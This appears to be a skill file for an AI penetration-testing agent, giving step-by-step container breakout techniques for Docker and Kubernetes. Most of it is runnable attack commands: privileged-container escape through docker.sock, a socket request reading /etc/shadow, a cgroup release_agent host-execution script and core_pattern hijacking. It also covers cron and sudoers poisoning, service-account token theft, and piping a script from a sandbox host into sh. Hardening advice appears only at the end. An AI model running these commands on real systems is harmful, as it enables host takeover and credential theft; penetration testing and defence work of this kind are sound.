---
name: Docker Escape
description: Reference for container breakout covering docker.sock abuse, CAP_SYS_ADMIN cgroups release_agent, hostPath / privileged container abuse, kernel exposures, and CVE landscape (CVE-2019-5736 runc, CVE-2024-21626 leaky-vessels).
---

# Docker Escape / Container Breakout

Reference for breaking out of a Docker container or unprivileged Linux namespace into the host. Pull this in when you have a shell inside a container (foothold via web exploit, RCE, etc.) and want to escalate to the host.

> Black-box scope: probes assume an already-acquired in-container shell. The agent runs commands through the existing channel (`kali_shell` if the container is the sandbox, or via the foothold's RCE primitive). Each section names the prerequisite explicitly.

## Tool wiring

| Action | Tool | Notes |
|---|---|---|
| Container-escape primitive scanner | `kali_shell /opt/tools/linux/deepce.sh` | Runs deepce against the current namespace; reports actionable escape paths. |
| Manual capability / mount enum | `kali_shell` | `cat /proc/self/status`, `mount`, `ls -la /var/run/docker.sock`. |
| Stage the script to a foothold | `kali_shell python3 -m http.server` | Serve `/opt/tools/linux/deepce.sh` over HTTP, fetch from the container. |
| Multi-step exploit | `execute_code` | When the escape needs careful step ordering. |

## Triage on the captured shell

Before attempting a breakout, fingerprint the container:

```bash
# Are we in a container?
ls /.dockerenv                                    # Docker
ls /run/.containerenv                             # Podman
cat /proc/1/cgroup | grep -E 'docker|kubepods|containerd'

# Capabilities granted
cat /proc/self/status | grep -E '^Cap(Inh|Prm|Eff|Bnd|Amb)'
capsh --print 2>/dev/null

# Mounted host paths
mount | grep -vE '^(proc|sys|tmpfs|devpts|cgroup|overlay|none|nsfs|mqueue)' | head

# Devices visible
ls -la /dev/ | grep -E 'sda|nvme|xvd|loop'

# AppArmor / SELinux
cat /proc/self/attr/current
cat /proc/self/attr/exec

# Seccomp
grep Seccomp /proc/self/status        # 0 = disabled, 2 = strict, 3 = filter

# Kernel version (for CVE matching)
uname -r
```

Then run deepce for an automated sweep:

```bash
# In the container shell:
curl -fsSL http://<sandbox-ip>:8000/deepce.sh | sh -s -- -f
# OR if deepce is already on disk:
sh /tmp/deepce.sh
```

deepce reports prioritized escape paths with command-line examples.

## Escape primitive matrix

### 1. docker.sock mounted

The `/var/run/docker.sock` socket is the Docker daemon's API. If mounted into the container, it is game over.

Detection:

```bash
ls -la /var/run/docker.sock
# srw-rw---- 1 root root 0 ... /var/run/docker.sock
```

Escape (spawn a privileged container with host root mounted):

```bash
docker -H unix:///var/run/docker.sock run -it --rm --privileged --net=host --pid=host --ipc=host -v /:/host alpine chroot /host /bin/bash
```

If `docker` binary is not in the container, use raw curl:

```bash
curl --unix-socket /var/run/docker.sock -X POST -H 'Content-Type: application/json' \
  -d '{"Image":"alpine","Cmd":["/bin/sh","-c","cat /host_etc/shadow"],"HostConfig":{"Binds":["/etc:/host_etc"],"Privileged":true}}' \
  http://localhost/v1.41/containers/create
# then start the container via the same socket
```

### 2. `--privileged` container

`--privileged` drops all kernel security restrictions. Detection: `CapEff` includes most caps, AppArmor unconfined.

Escape via cgroup release_agent (works on cgroup v1 only):

```bash
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp || mount -t cgroup -o memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
cat <<'EOF' > /cmd
#!/bin/sh
ps -ef > /tmp/proc_dump
EOF
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Triggers release_agent execution as root on the host
sleep 2
cat /tmp/proc_dump
```

cgroup v2 systems (most modern hosts) have a different release semantic; use the `core_pattern` route:

```bash
echo '|/proc/%P/root/tmp/payload.sh' > /proc/sys/kernel/core_pattern
```

### 3. CAP_SYS_ADMIN

The most powerful single capability. Detection: `CapEff: 00000000a82425fb` (bit 21 set) or `capsh --print | grep cap_sys_admin`.

Escape via cgroup release_agent (same as `--privileged` recipe above, since CAP_SYS_ADMIN is the cap that powers it).

Alternative (cgroup v2): mount `/proc` from a host pid namespace if accessible, then write to `release_agent` or `core_pattern`.

### 4. CAP_DAC_READ_SEARCH

Read any file on the host filesystem (within the same namespace).

```python
import ctypes, ctypes.util
libc = ctypes.CDLL(ctypes.util.find_library("c"), use_errno=True)
fh = (ctypes.c_byte * 16)(8, 0, 0, 0, 0, 0, 2, 0)   # struct file_handle for "/" inode
mfd = libc.open_by_handle_at(-100, fh, 0)
# Walk inodes by guessing handle bytes, read /etc/shadow on the host
```

Public exploit: `shocker.c` (single C file). Compile and run inside the container.

### 5. CAP_SYS_PTRACE

Attach to host processes (when PID namespace is shared) via `ptrace()`. Used to inject shellcode or read memory of host root processes.

```bash
gdb -p 1                    # if PID namespace is shared
gcore -o /tmp/core 1
strings /tmp/core.1 | grep -i password | head
```

### 6. CAP_SYS_MODULE

Load arbitrary kernel modules. Build a `.ko` that spawns a host root shell, insmod from inside.

### 7. hostPath / bind-mount of host directories

Detection: `mount` shows `/host`, `/var/run`, `/etc`, `/var/log` paths bound from outside.

| Mounted path | Escape |
|---|---|
| `/` (host root) | `chroot /host /bin/bash`; full takeover |
| `/var/run/docker.sock` | See section 1 |
| `/etc` (rw) | Append to `/etc/cron.d/poison` or `/etc/sudoers.d/poison` |
| `/etc/shadow` (ro) | Crack hashes offline (`john`, `hashcat`) |
| `/var/run/containerd/containerd.sock` | Equivalent of docker.sock for containerd |
| `/run/crio/crio.sock` | CRI-O |
| `/proc` (host's) | Many escape vectors via `core_pattern`, `kcore`, `mem` |
| `/sys/fs/cgroup` (rw) | `release_agent` chain |
| `/dev` (full) | Mount host disk: `mount /dev/sda1 /mnt && chroot /mnt` |

### 8. Shared namespaces (`--pid=host`, `--ipc=host`, `--net=host`)

| Flag | Effect | Escape |
|---|---|---|
| `--pid=host` | See host processes from container | `nsenter -t 1 -m -u -i -n -p -- /bin/bash` if CAP_SYS_ADMIN; `kill` host processes; ptrace |
| `--ipc=host` | Shared SysV IPC | Memory disclosure across host/container |
| `--net=host` | Shared network namespace | Bind to localhost-only host services (databases, debug ports) |
| `--userns=host` | Shared user namespace | UID 0 inside container == UID 0 on host (when no user-ns mapping) |

### 9. Kernel CVEs

| CVE | Affects | Escape primitive |
|---|---|---|
| CVE-2019-5736 (runc) | runc < 1.0-rc6 | Overwrite the runc binary on the host when a privileged exec lands |
| CVE-2022-0185 (FUSE / fsconfig) | Linux < 5.16.2 | OOB write -> arbitrary read/write |
| CVE-2022-0492 (cgroups v1) | Linux < 5.16 | Unprivileged release_agent escape (when user-ns + cgroup unprivileged) |
| CVE-2022-0847 (Dirty Pipe) | Linux 5.8 - 5.16.11 | Arbitrary file overwrite -> overwrite SUID binary or `/etc/passwd` |
| CVE-2024-21626 (runc, "leaky-vessels") | runc <= 1.1.11 | WORKDIR pointing at /proc/self/fd/N escapes; one of four "leaky-vessels" vulns |
| CVE-2024-23651 (BuildKit) | BuildKit < 0.12.5 | Race in mount handling during image build |

For each, use `uname -r` + `runc --version` (if visible) to fingerprint exploitability.

### 10. Sysctls

Some misconfigurations expose write to:

```bash
cat /proc/sys/kernel/core_pattern         # if writable, RCE on next core dump
cat /proc/sys/kernel/modprobe              # if writable, RCE on next modprobe
cat /proc/sys/fs/binfmt_misc/register      # if writable, RCE on binfmt-mapped exec
```

### 11. Mount /proc/self/exe

Containers that mount `/proc/self/exe` from the host (or its directory) allow overwrite -> next exec runs attacker code.

### 12. Container escape via Docker build

When the container is a build context (CI/CD environment), `docker build` may run with elevated daemon access. See `/skill ci_cd_attacks` (when shipped) for the CI-specific path.

## Probe sequence (when given a foothold shell)

```bash
# 1. Triage
ls /.dockerenv && cat /proc/1/cgroup
cat /proc/self/status | grep -E '^Cap'
mount

# 2. Run deepce (prioritizes escapes)
sh /tmp/deepce.sh -f

# 3. If docker.sock present:
docker -H unix:///var/run/docker.sock run -it --rm --privileged --pid=host -v /:/host alpine chroot /host /bin/bash

# 4. If --privileged or CAP_SYS_ADMIN:
# (cgroup release_agent recipe from section 2)

# 5. If host paths mounted:
ls -la /<host_path>; chroot or write payload

# 6. Kernel exploit fallback (Dirty Pipe / leaky-vessels):
uname -r
# match to CVE table; download exploit via /opt/tools/linux/<exploit>
```

## Kubernetes-specific

When the container is a Kubernetes pod:

```bash
# Service account token
ls /var/run/secrets/kubernetes.io/serviceaccount/
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt

# API server reachable?
curl --cacert /var/run/secrets/kubernetes.io/serviceaccount/ca.crt \
     -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" \
     https://kubernetes.default.svc/api/v1/namespaces

# Pod-level escape (privileged or hostPath set on the pod spec)
# Same primitives as Docker escape, plus kubectl-equivalent via the API.
```

For Kubernetes-specific probes (kube-hunter / peirates territory), see the dedicated K8s community skill (Tier 4 #35) when shipped.

## Validation shape

A clean container-escape finding includes:

1. The original foothold (how shell was obtained).
2. Container fingerprint: `/proc/1/cgroup` line, capabilities, mounts, AppArmor/SELinux state, kernel version.
3. The escape primitive used (docker.sock / privileged / specific capability / kernel CVE).
4. The exact command sequence.
5. Proof of host access: a host-only file's contents (e.g. `/etc/hostname` of the host vs container, `/etc/shadow` from host filesystem).
6. Cleanup steps (any artifacts written to the host removed).

## False positives

- Container with all default capabilities (no CAP_SYS_ADMIN, no privileged, no docker.sock, no hostPath, AppArmor docker-default profile). No straightforward escape.
- Read-only mounts of `/etc` / `/var/run/docker.sock` -- API is read-only; only enumeration possible.
- Recent kernel + runc, no public-CVE match.
- gVisor / Kata Containers / Firecracker -- additional sandboxing layers; standard primitives often fail.
- Rootless Docker / Podman with user-namespace remapping -- many escapes blocked.

## Hardening summary

- Drop `--privileged` for everything except trusted infrastructure.
- Never bind-mount `/var/run/docker.sock` into general-purpose containers.
- Use `--cap-drop=ALL --cap-add=<minimum>` and audit each cap.
- Read-only root filesystem (`--read-only`).
- Apply AppArmor / SELinux profiles (default is `docker-default`; tighter profiles available).
- Set `--security-opt=no-new-privileges` to block setuid escalation.
- Use user-namespace remapping (`--userns=<map>`) to break root-in-container = root-on-host.
- Keep runc + containerd + Docker patched (especially against CVE-2024-21626).
- For Kubernetes: PodSecurityStandards `restricted`, RBAC scoped to specific resources, NetworkPolicies on every namespace.

## Hand-off

```
Escape achieved -> host root            -> /skill linux_privesc (host-side enumeration / persistence)
docker.sock abuse                        -> escalate; full daemon control
Kubernetes pod foothold                  -> kube-hunter / peirates community skill (when shipped)
Cloud-hosted container (ECS/EKS/GKE/ACI) -> /skill aws / /skill azure / /skill gcp (chain to cloud abuse)
Kernel CVE exploit                       -> CVE-specific exploit code via /opt/tools/linux/
```

## Pro tips

- The fastest signal is `mount | grep -v overlay`. If anything from the host is bind-mounted in, an escape is almost certainly available.
- AppArmor `docker-default` blocks several primitives even with CAP_SYS_ADMIN; check `/proc/self/attr/current` first.
- cgroup v1 vs v2 changes the `release_agent` recipe completely. Verify with `mount | grep cgroup` before crafting.
- runc patches in 2024 (CVE-2024-21626 et al.) closed several CI-related escapes; older CI runners are still rich hunting grounds.
- A "rootless Docker" container is much harder to escape from but not immune; user-namespace bugs still appear.
- gVisor / Kata Containers signal: `dmesg` shows runsc-style kernel messages, `uname -a` may hint at the sandboxed kernel. Treat as much harder targets and switch to in-container post-exploitation rather than escape.
- When kernel-CVE exploitation is the only path, verify the exact patch level with `cat /proc/version`, `dpkg -l linux-image-* 2>/dev/null`, or distribution-specific commands. Do not assume `uname -r` is the full picture.
